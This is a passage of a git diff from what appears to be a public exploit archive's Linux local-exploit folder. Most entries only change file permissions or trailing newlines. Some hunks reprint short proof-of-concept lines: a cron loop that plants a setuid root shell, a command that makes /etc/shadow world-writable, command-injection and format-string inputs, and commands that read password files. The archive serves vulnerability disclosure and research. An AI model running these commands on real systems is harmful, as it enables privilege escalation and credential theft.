(start-process "/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes" "msux") ) . xxx) ) ) *** ;;; comment-start: ";;; " *** ;;; comment-end:"***" *** -;;; End: *** \ No newline at end of file +;;; End: *** \ No newline at end of file diff --git a/platforms/linux/local/26498.txt b/platforms/linux/local/26498.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/27065.txt b/platforms/linux/local/27065.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/27066.txt b/platforms/linux/local/27066.txt old mode 100755 new mode 100644 index ec69ec189..a73bb02e4 --- a/platforms/linux/local/27066.txt +++ b/platforms/linux/local/27066.txt @@ -10,4 +10,4 @@ for '/etc/nu': echo "" >> /tmp/acid udbgen -p /tmp echo `perl -e 'print "A"x10000'` >> /tmp/script -/etc/nu -p /tmp -c /tmp/script -a \ No newline at end of file +/etc/nu -p /tmp -c /tmp/script -a \ No newline at end of file diff --git a/platforms/linux/local/27231.txt b/platforms/linux/local/27231.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/27297.c b/platforms/linux/local/27297.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/273.c b/platforms/linux/local/273.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/27461.c b/platforms/linux/local/27461.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/27766.txt b/platforms/linux/local/27766.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/27769.txt b/platforms/linux/local/27769.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/28287.c b/platforms/linux/local/28287.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/28288.c b/platforms/linux/local/28288.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/28405.txt b/platforms/linux/local/28405.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/285.c b/platforms/linux/local/285.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/28657.c b/platforms/linux/local/28657.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/28680.txt b/platforms/linux/local/28680.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/28806.txt b/platforms/linux/local/28806.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/29446.c b/platforms/linux/local/29446.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/29467.c b/platforms/linux/local/29467.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/29714.txt b/platforms/linux/local/29714.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/29746.txt b/platforms/linux/local/29746.txt old mode 100755 new mode 100644 index 45e601015..78a95cb11 --- a/platforms/linux/local/29746.txt +++ b/platforms/linux/local/29746.txt @@ -4,4 +4,4 @@ Horde Framework and IMP are prone to a vulnerability that allows a local attacke A successful attack can reduce the integrity of affected computers and may aid in further attacks. -An attacker could exploit this issue by creating a file '/tmp/x /etc/passwd /tmpmswordx' and running the affected cron script. This will result in the deletion of '/tmp/x', '/etc/passwd', and '/tmp/mswordx'. \ No newline at end of file +An attacker could exploit this issue by creating a file '/tmp/x /etc/passwd /tmpmswordx' and running the affected cron script. This will result in the deletion of '/tmp/x', '/etc/passwd', and '/tmp/mswordx'. \ No newline at end of file diff --git a/platforms/linux/local/29822.c b/platforms/linux/local/29822.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/29954.txt b/platforms/linux/local/29954.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3.c b/platforms/linux/local/3.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/30093.txt b/platforms/linux/local/30093.txt old mode 100755 new mode 100644 index 2858720dd..e131f7e02 --- a/platforms/linux/local/30093.txt +++ b/platforms/linux/local/30093.txt @@ -8,4 +8,4 @@ An attacker can exploit this issue to execute arbitrary code with the with the p # useradd -c '&&&&&&&&& your-favourite-ascii-shellcode-here' $USERNAME # echo alias billg $USERNAME >~/.muttrc # mutt billg -# Segmentation fault (core dumped) \ No newline at end of file +# Segmentation fault (core dumped) \ No newline at end of file diff --git a/platforms/linux/local/30280.txt b/platforms/linux/local/30280.txt old mode 100755 new mode 100644 index 8e4e2d091..3d01d7109 --- a/platforms/linux/local/30280.txt +++ b/platforms/linux/local/30280.txt @@ -4,4 +4,4 @@ GFAX is prone to a vulnerability that lets local attackers execute arbitrary com GFAX 0.7.6 is vulnerable; other versions may also be affected. -while true; do echo "*/1 * * * * root /bin/cp /bin/sh /tmp && chmod 4755 /tmp/sh" > /tmp/crontab; done \ No newline at end of file +while true; do echo "*/1 * * * * root /bin/cp /bin/sh /tmp && chmod 4755 /tmp/sh" > /tmp/crontab; done \ No newline at end of file diff --git a/platforms/linux/local/30464.c b/platforms/linux/local/30464.c old mode 100755 new mode 100644 index fa136fd4a..8b2b17721 --- a/platforms/linux/local/30464.c +++ b/platforms/linux/local/30464.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/25251/info GSWKT (Generic Software Wrappers Toolkit) is prone to multiple concurrency vulnerabilities because of its implementation of system call wrappers. This problem can result in a race condition between a user thread and the kernel. @@ -5,6 +6,7 @@ GSWKT (Generic Software Wrappers Toolkit) is prone to multiple concurrency vulne Attackers can exploit these issues by replacing certain values in system call wrappers with malicious data to elevate privileges or to bypass auditing. Successful attacks can completely compromise affected computers. GSWKT 1.6.3 is vulnerable; other versions may also be affected. +*/ #define EVIL_NAME ./home/ko/.forward. #define REAL_NAME ./home/ko/Inbox. diff --git a/platforms/linux/local/30503.txt b/platforms/linux/local/30503.txt old mode 100755 new mode 100644 index dd3fa63ea..fafbf790f --- a/platforms/linux/local/30503.txt +++ b/platforms/linux/local/30503.txt @@ -6,4 +6,4 @@ An attacker with administrative privileges can exploit this issue to execute arb Adonis 5.0.2.8 is vulnerable; other versions may also be affected. -set host-name ;bash \ No newline at end of file +set host-name ;bash \ No newline at end of file diff --git a/platforms/linux/local/30604.c b/platforms/linux/local/30604.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/30605.c b/platforms/linux/local/30605.c old mode 100755 new mode 100644 index 461ab76a6..eb9615817 --- a/platforms/linux/local/30605.c +++ b/platforms/linux/local/30605.c @@ -66,5 +66,4 @@ int main() { fd=open("/proc/driver/snd-page-alloc",O_RDONLY); } else printf("%c",kern_mem[0]); } -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/30620.txt b/platforms/linux/local/30620.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/30780.txt b/platforms/linux/local/30780.txt old mode 100755 new mode 100644 index bd8dc19be..5398eae77 --- a/platforms/linux/local/30780.txt +++ b/platforms/linux/local/30780.txt @@ -6,4 +6,4 @@ A local attacker can exploit this issue to gain elevated privileges on the affec ISPmanager 4.2.15.1 is reported vulnerable; other versions may be affected as well. -/usr/local/ispmgr/sbin/responder /tmp/ '` cat /etc/master.passwd1>&2 `' 2>&1 \ No newline at end of file +/usr/local/ispmgr/sbin/responder /tmp/ '` cat /etc/master.passwd1>&2 `' 2>&1 \ No newline at end of file diff --git a/platforms/linux/local/30839.c b/platforms/linux/local/30839.c old mode 100755 new mode 100644 index ec32f69bf..899ed1115 --- a/platforms/linux/local/30839.c +++ b/platforms/linux/local/30839.c @@ -1,32 +1,24 @@ -source: http://www.securityfocus.com/bid/26680/info +#include <sys/types.h> +#include <unistd.h> +#include <pwd.h> +#include <stdio.h> -ZABBIX is prone to a local privilege-escalation vulnerability. - -An attacker can exploit this issue to execute commands with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. - -This issue affects ZABBIX 1.4.2; prior versions may also be affected. - - #include <sys/types.h> - #include <unistd.h> - #include <pwd.h> - #include <stdio.h> - int main() { - struct passwd *pw; - pw = getpwnam("abi"); - FILE *pipe; - char buf[25]; - setgid(pw->pw_gid); - setuid(pw->pw_uid); - - printf("my gid: %d\n", getegid()); - printf("my uid: %d\n", getuid()); - - pipe = popen("/usr/bin/id", "r"); - while (fgets(buf, sizeof buf, pipe)) { - printf("%s", buf); - } - printf("\n"); - pclose(pipe); - } \ No newline at end of file + struct passwd *pw; + pw = getpwnam("abi"); + FILE *pipe; + char buf[25]; + setgid(pw->pw_gid); + setuid(pw->pw_uid); + + printf("my gid: %d\n", getegid()); + printf("my uid: %d\n", getuid()); + + pipe = popen("/usr/bin/id", "r"); + while (fgets(buf, sizeof buf, pipe)) { + printf("%s", buf); + } + printf("\n"); + pclose(pipe); +} \ No newline at end of file diff --git a/platforms/linux/local/31151.c b/platforms/linux/local/31151.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/31346.c b/platforms/linux/local/31346.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3154.c b/platforms/linux/local/3154.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/317.txt b/platforms/linux/local/317.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/319.c b/platforms/linux/local/319.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/31911.txt b/platforms/linux/local/31911.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/31959.txt b/platforms/linux/local/31959.txt old mode 100755 new mode 100644 index 334c59e30..25582d6a4 --- a/platforms/linux/local/31959.txt +++ b/platforms/linux/local/31959.txt @@ -14,4 +14,4 @@ lrwxrwxrwx 1 example example 3 2008-06-21 09:06 bar -> foo % perl -e 'use File::Path rmtree; rmtree bar' % ls -l foo bar ls: cannot access bar: No such file or directory --rwxrwxrwx 1 example example 0 2008-06-21 09:06 foo \ No newline at end of file +-rwxrwxrwx 1 example example 0 2008-06-21 09:06 foo \ No newline at end of file diff --git a/platforms/linux/local/3213.c b/platforms/linux/local/3213.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/322.c b/platforms/linux/local/322.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/32446.txt b/platforms/linux/local/32446.txt old mode 100755 new mode 100644 index f253a6e48..4bd5d289f --- a/platforms/linux/local/32446.txt +++ b/platforms/linux/local/32446.txt @@ -7,4 +7,4 @@ UPDATE (December 19, 2008): The initial proposed patches did not resolve this is Xen 3.3 is vulnerable; other versions may also be affected. #yum install xen -# xenstore-write /local/domain/GUEST-DOMID/console/tty /i/am/the/evil/guest \ No newline at end of file +# xenstore-write /local/domain/GUEST-DOMID/console/tty /i/am/the/evil/guest \ No newline at end of file diff --git a/platforms/linux/local/325.c b/platforms/linux/local/325.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/32805.c b/platforms/linux/local/32805.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/32820.txt b/platforms/linux/local/32820.txt old mode 100755 new mode 100644 index 4a858ae32..865d79265 --- a/platforms/linux/local/32820.txt +++ b/platforms/linux/local/32820.txt @@ -27,4 +27,4 @@ To access such an object with low-level tools: opensc-explorer cd 5015 -get 4701 \ No newline at end of file +get 4701 \ No newline at end of file diff --git a/platforms/linux/local/32829.c b/platforms/linux/local/32829.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/32848.txt b/platforms/linux/local/32848.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/32947.txt b/platforms/linux/local/32947.txt old mode 100755 new mode 100644 index 2648f8226..630448d15 --- a/platforms/linux/local/32947.txt +++ b/platforms/linux/local/32947.txt @@ -12,4 +12,4 @@ On server: $ ls -la /etc/poc -rw-r--r-- 1 root root 514 Apr 22 09:05 /etc/poc $ zcat /etc/poc | head -1 --- MySQL dump 10.9 \ No newline at end of file +-- MySQL dump 10.9 \ No newline at end of file diff --git a/platforms/linux/local/33028.txt b/platforms/linux/local/33028.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/331.c b/platforms/linux/local/331.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/33145.c b/platforms/linux/local/33145.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/33255.txt b/platforms/linux/local/33255.txt old mode 100755 new mode 100644 index e959d7c36..f047f54fe --- a/platforms/linux/local/33255.txt +++ b/platforms/linux/local/33255.txt @@ -11,4 +11,4 @@ press space bar to stop the grub count down press e to edit select the kernel line and press e Append a "1" to the end of the kernel line and press return -press "b" to boot \ No newline at end of file +press "b" to boot \ No newline at end of file diff --git a/platforms/linux/local/33321.c b/platforms/linux/local/33321.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/33322.c b/platforms/linux/local/33322.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/33336.c b/platforms/linux/local/33336.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/33387.txt b/platforms/linux/local/33387.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/33395.txt b/platforms/linux/local/33395.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/33508.txt b/platforms/linux/local/33508.txt old mode 100755 new mode 100644 index 7e7942356..92c115058 --- a/platforms/linux/local/33508.txt +++ b/platforms/linux/local/33508.txt @@ -13,4 +13,4 @@ Displays: coasd/ Expected: -couc??asd/ \ No newline at end of file +couc??asd/ \ No newline at end of file diff --git a/platforms/linux/local/33523.c b/platforms/linux/local/33523.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/33576.txt b/platforms/linux/local/33576.txt old mode 100755 new mode 100644 index 48007190e..278344003 --- a/platforms/linux/local/33576.txt +++ b/platforms/linux/local/33576.txt @@ -8,4 +8,4 @@ This issue affects BLTK 1.0.9; other versions may be vulnerable as well. The following proof of concept is available: -/usr/lib/bltk/bin/bltk_sudo /bin/bash \ No newline at end of file +/usr/lib/bltk/bin/bltk_sudo /bin/bash \ No newline at end of file diff --git a/platforms/linux/local/33614.c b/platforms/linux/local/33614.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/33623.txt b/platforms/linux/local/33623.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/33808.c b/platforms/linux/local/33808.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/33824.c b/platforms/linux/local/33824.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3384.c b/platforms/linux/local/3384.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/33899.txt b/platforms/linux/local/33899.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/339.c b/platforms/linux/local/339.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/33904.txt b/platforms/linux/local/33904.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/33963.txt b/platforms/linux/local/33963.txt old mode 100755 new mode 100644 index 149dd7fa8..94187107e --- a/platforms/linux/local/33963.txt +++ b/platforms/linux/local/33963.txt @@ -7,4 +7,4 @@ Local attackers can exploit these issues to obtain sensitive information that ma The following example commands are available: $ gdomap -c /etc/shadow -$ gdomap -a /etc/shadow \ No newline at end of file +$ gdomap -a /etc/shadow \ No newline at end of file diff --git a/platforms/linux/local/34001.c b/platforms/linux/local/34001.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3426.php b/platforms/linux/local/3426.php old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3427.php b/platforms/linux/local/3427.php old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3440.php b/platforms/linux/local/3440.php old mode 100755 new mode 100644 diff --git a/platforms/linux/local/34421.c b/platforms/linux/local/34421.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/34537.txt b/platforms/linux/local/34537.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3479.php b/platforms/linux/local/3479.php old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3480.php b/platforms/linux/local/3480.php old mode 100755 new mode 100644 diff --git a/platforms/linux/local/34923.c b/platforms/linux/local/34923.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/34987.c b/platforms/linux/local/34987.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3499.php b/platforms/linux/local/3499.php old mode 100755 new mode 100644 diff --git a/platforms/linux/local/35161.c b/platforms/linux/local/35161.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3525.php b/platforms/linux/local/3525.php old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3529.php b/platforms/linux/local/3529.php old mode 100755 new mode 100644 diff --git a/platforms/linux/local/35370.c b/platforms/linux/local/35370.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/35450.txt b/platforms/linux/local/35450.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/35595.txt b/platforms/linux/local/35595.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/35681.txt b/platforms/linux/local/35681.txt old mode 100755 new mode 100644 index 5b93bc85b..40a68c7c8 --- a/platforms/linux/local/35681.txt +++ b/platforms/linux/local/35681.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to run arbitrary commands with superuser priv The following example command is available: -sudo opcontrol -e "abcd;/usr/bin/id" \ No newline at end of file +sudo opcontrol -e "abcd;/usr/bin/id" \ No newline at end of file diff --git a/platforms/linux/local/3571.php b/platforms/linux/local/3571.php old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3572.php b/platforms/linux/local/3572.php old mode 100755 new mode 100644 diff --git a/platforms/linux/local/35748.txt b/platforms/linux/local/35748.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/35749.txt b/platforms/linux/local/35749.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3587.c b/platforms/linux/local/3587.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3595.c b/platforms/linux/local/3595.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/36257.txt b/platforms/linux/local/36257.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/36294.c b/platforms/linux/local/36294.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/36564.txt b/platforms/linux/local/36564.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/36746.c b/platforms/linux/local/36746.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/36747.c b/platforms/linux/local/36747.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/36820.txt b/platforms/linux/local/36820.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/36966.txt b/platforms/linux/local/36966.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/37088.c b/platforms/linux/local/37088.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/37089.txt b/platforms/linux/local/37089.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/37167.c b/platforms/linux/local/37167.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/37168.txt b/platforms/linux/local/37168.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/37183.c b/platforms/linux/local/37183.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/37265.txt b/platforms/linux/local/37265.txt old mode 100755 new mode 100644 index be6c277e3..95354e0aa --- a/platforms/linux/local/37265.txt +++ b/platforms/linux/local/37265.txt @@ -43,4 +43,4 @@ by underprivileged users. The fix for this is to create temporary trusted file names that symlink back to the original files before calling system() and running the -system's "diff" command. \ No newline at end of file +system's "diff" command. \ No newline at end of file diff --git a/platforms/linux/local/37292.c b/platforms/linux/local/37292.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/37293.txt b/platforms/linux/local/37293.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/3730.txt b/platforms/linux/local/3730.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/374.c b/platforms/linux/local/374.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/375.c b/platforms/linux/local/375.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/37543.c b/platforms/linux/local/37543.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/37631.c b/platforms/linux/local/37631.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/37710.txt b/platforms/linux/local/37710.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/37937.c b/platforms/linux/local/37937.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/38232.txt b/platforms/linux/local/38232.txt old mode 100755 new mode 100644 index 417267750..1df4887fc --- a/platforms/linux/local/38232.txt +++ b/platforms/linux/local/38232.txt @@ -10,4 +10,4 @@ A local attacker can exploit this issue to crash the affected application, denyi % perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -M [1] 13433 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' | -13434 segmentation fault sort -M \ No newline at end of file +13434 segmentation fault sort -M \ No newline at end of file diff --git a/platforms/linux/local/38298.txt b/platforms/linux/local/38298.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/38353.txt b/platforms/linux/local/38353.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/38357.c b/platforms/linux/local/38357.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/38390.c b/platforms/linux/local/38390.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/38559.txt b/platforms/linux/local/38559.txt old mode 100755 new mode 100644 index 4e23421b1..eb9956cae --- a/platforms/linux/local/38559.txt +++ b/platforms/linux/local/38559.txt @@ -6,4 +6,4 @@ Local attackers can exploit the issue to execute arbitrary code with kernel priv # rmmod b43 # modprobe b43 fwpostfix=AA%xBB -# dmesg \ No newline at end of file +# dmesg \ No newline at end of file diff --git a/platforms/linux/local/38817.txt b/platforms/linux/local/38817.txt old mode 100755 new mode 100644 index fdd880c2f..e63b2324d --- a/platforms/linux/local/38817.txt +++ b/platforms/linux/local/38817.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code in the context of t Versions prior to Poppler 0.24.3 are vulnerable. -./pdfseparate -f 1 -l 1 aPdfFile.pdf "%x%x%x%x%x%x%n" \ No newline at end of file +./pdfseparate -f 1 -l 1 aPdfFile.pdf "%x%x%x%x%x%x%n" \ No newline at end of file diff --git a/platforms/linux/local/38937.txt b/platforms/linux/local/38937.txt old mode 100755 new mode 100644 index 90936f180..4ce58e9d1 --- a/platforms/linux/local/38937.txt +++ b/platforms/linux/local/38937.txt @@ -6,4 +6,4 @@ Local attackers can exploit this issue to obtain sensitive information. Informat Apache Libcloud versions 0.12.3 through 0.13.2 are vulnerable. -dd if=/dev/vda bs=1M | strings -n 100 > out.txt \ No newline at end of file +dd if=/dev/vda bs=1M | strings -n 100 > out.txt \ No newline at end of file diff --git a/platforms/linux/local/39010.c b/platforms/linux/local/39010.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/39112.txt b/platforms/linux/local/39112.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/39134.txt b/platforms/linux/local/39134.txt old mode 100755 new mode 100644 index 863e8bafe..b42f974cd --- a/platforms/linux/local/39134.txt +++ b/platforms/linux/local/39134.txt @@ -46,4 +46,4 @@ CVEID: 2015-7556 Exploit Code: -$ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme \ No newline at end of file +$ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme \ No newline at end of file diff --git a/platforms/linux/local/39166.c b/platforms/linux/local/39166.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/39207.txt b/platforms/linux/local/39207.txt old mode 100755 new mode 100644 index 66b1d717e..73f2baa30 --- a/platforms/linux/local/39207.txt +++ b/platforms/linux/local/39207.txt @@ -10,4 +10,4 @@ dpkg 1.3.0 is vulnerable; other versions may also be affected. Index: index/symlink/index-file @@ -0,0 +1,1 @@ +Escaped -`--- \ No newline at end of file +`--- \ No newline at end of file diff --git a/platforms/linux/local/39214.c b/platforms/linux/local/39214.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/39217.c b/platforms/linux/local/39217.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/39230.c b/platforms/linux/local/39230.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/39244.txt b/platforms/linux/local/39244.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/39277.c b/platforms/linux/local/39277.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/393.c b/platforms/linux/local/393.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/394.c b/platforms/linux/local/394.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/39549.txt b/platforms/linux/local/39549.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/39628.txt b/platforms/linux/local/39628.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/39769.txt b/platforms/linux/local/39769.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/39771.txt b/platforms/linux/local/39771.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/39772.txt b/platforms/linux/local/39772.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/39811.txt b/platforms/linux/local/39811.txt old mode 100755 new mode 100644 index f7de27d66..3e987933b --- a/platforms/linux/local/39811.txt +++ b/platforms/linux/local/39811.txt @@ -43,4 +43,4 @@ sh: 1: /usr/bin/clamscan: not found 1 exec empty: OK snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ls -la /tmp/ | grep pwn3d -rw-rw-r-- 1 snort snort 0 Maj 13 16:45 pwn3d -snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ \ No newline at end of file +snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ \ No newline at end of file diff --git a/platforms/linux/local/39967.txt b/platforms/linux/local/39967.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/39992.txt b/platforms/linux/local/39992.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40003.c b/platforms/linux/local/40003.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40054.c b/platforms/linux/local/40054.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40169.txt b/platforms/linux/local/40169.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40270.txt b/platforms/linux/local/40270.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/4028.txt b/platforms/linux/local/4028.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40360.txt b/platforms/linux/local/40360.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40450.txt b/platforms/linux/local/40450.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40465.txt b/platforms/linux/local/40465.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40488.txt b/platforms/linux/local/40488.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40489.txt b/platforms/linux/local/40489.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40611.c b/platforms/linux/local/40611.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40616.c b/platforms/linux/local/40616.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40678.c b/platforms/linux/local/40678.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40788.txt b/platforms/linux/local/40788.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40789.txt b/platforms/linux/local/40789.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40810.c b/platforms/linux/local/40810.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40812.c b/platforms/linux/local/40812.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40838.c b/platforms/linux/local/40838.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40839.c b/platforms/linux/local/40839.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40847.cpp b/platforms/linux/local/40847.cpp old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40936.html b/platforms/linux/local/40936.html old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40937.txt b/platforms/linux/local/40937.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40943.txt b/platforms/linux/local/40943.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/40962.txt b/platforms/linux/local/40962.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41022.txt b/platforms/linux/local/41022.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/411.c b/platforms/linux/local/411.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41152.txt b/platforms/linux/local/41152.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41158.txt b/platforms/linux/local/41158.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41171.txt b/platforms/linux/local/41171.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41173.c b/platforms/linux/local/41173.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41196.txt b/platforms/linux/local/41196.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41356.txt b/platforms/linux/local/41356.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41435.txt b/platforms/linux/local/41435.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41458.c b/platforms/linux/local/41458.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41597.txt b/platforms/linux/local/41597.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/417.c b/platforms/linux/local/417.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/4172.c b/platforms/linux/local/4172.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41760.txt b/platforms/linux/local/41760.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41761.txt b/platforms/linux/local/41761.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41762.txt b/platforms/linux/local/41762.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41763.txt b/platforms/linux/local/41763.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41764.txt b/platforms/linux/local/41764.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41765.txt b/platforms/linux/local/41765.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41766.txt 